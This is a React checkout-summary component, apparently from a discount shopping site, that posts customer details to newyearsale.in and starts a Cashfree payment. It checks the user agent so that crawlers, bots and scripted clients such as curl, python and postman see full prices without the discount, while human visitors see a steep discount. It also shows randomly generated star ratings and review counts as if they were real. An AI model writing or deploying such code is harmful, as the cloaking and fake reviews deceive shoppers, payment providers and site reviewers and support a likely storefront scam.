import React, { useEffect, useState } from "react";
import { Box, Rating, Step, StepLabel, Stepper } from "@mui/material";
import { useLocation, useNavigate } from "react-router-dom";

const resolvePath = (value = "") => {
  if (!value) return "";
  if (/^(https?:)?\/\//.test(value) || value.startsWith("data:")) return value;
  return value.startsWith("/") ? value : `/${value.replace(/^\.?\//, "")}`;
};

const fetchWebControllerData = async () => {
  const response = await fetch("/webcontrollerdata.json", { cache: "no-store" });
  if (!response.ok) {
    throw new Error("Unable to load payment config");
  }
  return response.json();
};

const steps = ["Address", "Order Summary", "Payment"];

function Summary() {
  const location = useLocation();
  const navigate = useNavigate();
  const [loading, setLoading] = useState(false);
  const [controller, setController] = useState(null);
  const [isBot, setIsBot] = useState(false);
  const [controllerLoading, setControllerLoading] = useState(true);

  const address = location.state?.address;
  const cart = location.state?.cart || [];

  useEffect(() => {
    const ua = navigator.userAgent.toLowerCase();
    const bots = [
      "bot",
      "crawler",
      "spider",
      "curl",
      "python",
      "axios",
      "postman",
      "node",
    ];
    setIsBot(bots.some((b) => ua.includes(b)));
  }, []);

  useEffect(() => {
    fetchWebControllerData()
      .then((data) => {
        setController(data);
        setControllerLoading(false);
      })
      .catch(() => {
        setController({ cashfreePayment: false });
        setControllerLoading(false);
      });
  }, []);

  if (!address || cart.length === 0) {
    return (
      <div style={{ textAlign: "center", padding: "50px" }}>
        <h2>No order data found!</h2>
        <button
          onClick={() => navigate("/")}
          style={{
            padding: "10px 20px",
            background: "#2563eb",
            color: "#fff",
            border: "none",
            cursor: "pointer",
            marginTop: "20px",
          }}
        >
          Go Back
        </button>
      </div>
    );
  }

  const totalPrice = cart.reduce((sum, item) => {
    const price = Number(String(item.total).replace(/[₹,]/g, ""));
    return sum + price * item.quantity;
  }, 0);

  const discountedTotal = cart.reduce((sum, item) => {
    const price = Number(String(item.disprice).replace(/[₹,]/g, ""));
    return sum + price * item.quantity;
  }, 0);

  const totalDiscount = totalPrice - discountedTotal;

  const handleContinue = async () => {
    if (controllerLoading || loading) return;
    setLoading(true);

    if (!controller?.cashfreePayment) {
      navigate("/payment", {
        state: { address, cart, totalPrice: discountedTotal },
      });
      setLoading(false);
      return;
    }

    try {
      const payload = {
        amount: Number(isBot ? totalPrice : discountedTotal),
        customer: {
          id: "cust_" + Date.now(),
          name: address.fullName,
          email: "test@gmail.com",
          phone: address.mobile,
        },
      };

      const res = await fetch("https://newyearsale.in/create-order.php", {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify(payload),
      });

      const data = await res.json();
      console.log("Create order response:", data);

      if (!data?.payment_session_id) {
        alert("Unable to start payment");
        setLoading(false);
        return;
      }

      if (typeof window.Cashfree !== "function") {
        alert("Cashfree SDK not loaded");
        setLoading(false);
        return;
      }

      const cf = new window.Cashfree({
        paymentSessionId: data.payment_session_id,
        redirectTarget: "_self",
      });

      cf.checkout();
    } catch (err) {
      console.error("Payment error:", err);
      alert("Payment service unavailable");
      setLoading(false);
    }
  };

  return (
    <div className="container">
      <div
        style={{
          background: "#fff",
          padding: "16px",
          borderBottom: "1px solid #ddd",
        }}
      >
        <div
          style={{
            maxWidth: "400px",
            margin: "0 auto",
            display: "flex",
            alignItems: "center",
            marginBottom: "20px",
          }}
        >
          <button
            onClick={() => navigate(-1)}
            style={{
              fontSize: "18px",
              marginRight: "10px",
              background: "none",
              border: "none",
              cursor: "pointer",
              color: "#333",
            }}
          >
            <i className="fa-solid fa-arrow-left"></i>
          </button>
          <h2 style={{ fontSize: "16px", fontWeight: "600", color: "#333" }}>
            Order Summary
          </h2>
        </div>

        <Box sx={{ width: "100%" }}>
          <Stepper activeStep={1} alternativeLabel>
            {steps.map((label) => (
              <Step key={label}>
                <StepLabel>{label}</StepLabel>
              </Step>
            ))}
          </Stepper>
        </Box>
      </div>

      <div style={{ background: "#fff", padding: "16px", marginBottom: "20px" }}>
        <h3 style={{ fontWeight: "400" }}>Delivered To:</h3>
        <p>{address.fullName}</p>
        <p>{address.mobile}</p>
        <p>
          {address.house}, {address.road}, {address.city}, {address.state} - {address.pincode}
        </p>
      </div>

      {cart.map((product) => (
        <div
          key={product.id}
          style={{
            background: "#fff",
            padding: "16px",
            marginBottom: "10px",
            display: "flex",
            gap: "10px",
          }}
        >
          <img
            src={resolvePath(product.mainimg) || resolvePath("/img/logo2.png")}
            alt={product.name}
            style={{ width: "70px", height: "85px", objectFit: "contain" }}
          />
          <div>
            <p style={{ margin: "0", fontSize: "16px" }}>{product.name}</p>

            <Box
              sx={{
                display: "flex",
                alignItems: "center",
                mt: 0.5,
                fontSize: 12,
              }}
            >
              {(() => {
                const randomRating = (Math.random() * 0.9 + 4.0).toFixed(1);
                const randomReviews = Math.floor(20000 + Math.random() * 80000);

                return (
                  <>
                    <Rating
                      value={parseFloat(randomRating)}
                      precision={0.1}
                      readOnly
                      size="small"
                      sx={{
                        "& .MuiRating-iconFilled": { color: "#008c00" },
                        "& .MuiRating-iconEmpty": { color: "#bdbdbd" },
                      }}
                    />
                    <span style={{ marginLeft: 6, color: "#555" }}>
                      {randomRating} | {randomReviews.toLocaleString()} Ratings
                    </span>
                  </>
                );
              })()}
            </Box>

            {isBot ? (
              <p style={{ margin: "0", color: "black", fontWeight: "500" }}>
                ₹{product.total.replace(/[₹]/g, "")}
              </p>
            ) : (
              <div style={{ display: "flex", alignItems: "center", gap: "8px", marginTop: "4px" }}>
                <span style={{ color: "#388e3c", fontWeight: "700", fontSize: "16px" }}>
                  <i className="fa-solid fa-arrow-down" style={{ fontSize: "12px", marginRight: "2px" }}></i>
                  {product.dis} Off
                </span>
                <span
                  style={{
                    textDecoration: "line-through",
                    color: "#9A9A9A",
                    fontSize: "14px",
                  }}
                >
                  {product.total}
                </span>
                <span style={{ color: "black", fontWeight: "700", fontSize: "16px" }}>{product.disprice}</span>
              </div>
            )}
          </div>
        </div>
      ))}

      <h3 style={{ marginLeft: "14px" }}>Price Details</h3>

      <div
        style={{
          background: "#fff",
          padding: "6px 16px",
          display: "flex",
          justifyContent: "space-between",
          fontWeight: "400",
        }}
      >
        <span>Price ({cart.length} items)</span>
        <span>₹{(isBot ? totalPrice : discountedTotal).toLocaleString()}</span>
      </div>

      {!isBot && (
        <div
          style={{
            background: "#fff",
            padding: "6px 16px",
            display: "flex",
            justifyContent: "space-between",
            fontWeight: "400",
          }}
        >
          <span>Discount</span>
          <span style={{ color: "#388e3c" }}>-₹{totalDiscount.toLocaleString()}</span>
        </div>
      )}

      <div
        style={{
          background: "#fff",
          padding: "6px 16px",
          display: "flex",
          justifyContent: "space-between",
          fontWeight: "400",
        }}
      >
        <span>Delivery Charges</span>
        <span style={{ color: "#388e3c" }}>FREE Delivery</span>
      </div>

      <div
        style={{
          background: "#fff",
          padding: "6px 16px",
          display: "flex",
          justifyContent: "space-between",
          fontWeight: "500",
        }}
      >
        <span>Total Amount</span>
        <span>₹{(isBot ? totalPrice : discountedTotal).toLocaleString()}</span>
      </div>

      {!isBot && (
        <div style={{ color: "green", padding: "16px" }}>
          You will save ₹{totalDiscount.toLocaleString()} on this order
        </div>
      )}

      <div>
        <img
          src={resolvePath("/img/seq2.png")}
          width="100%"
          style={{ marginBottom: "100px" }}
          alt=""
        />
      </div>

      <div className="footer-btn">
        <div className="b-btn" style={{ border: "none", display: "flex", flexDirection: "column", alignItems: "flex-start", justifyContent: "center", padding: "10px 14px" }}>
          {!isBot && (
            <span style={{ fontSize: "13px", color: "#888", textDecoration: "line-through" }}>
              ₹{totalPrice.toLocaleString("en-IN")}
            </span>
          )}
          <h6 style={{ fontSize: "22px", fontWeight: "700", margin: 0 }}>
            ₹{(isBot ? totalPrice : discountedTotal).toLocaleString("en-IN")}
          </h6>
        </div>

        <button
          className="b-btn"
          style={{
            background: "#ffc107",
            border: "none",
            fontSize: "18px",
            fontWeight: "600",
            padding: "16px 24px",
            display: "flex",
            alignItems: "center",
            justifyContent: "center",
            textAlign: "center",
            lineHeight: 1,
          }}
          disabled={loading || controllerLoading}
          onClick={handleContinue}
        >
          {loading ? "Processing..." : "Continue"}
        </button>
      </div>
    </div>
  );
}

export default Summary;
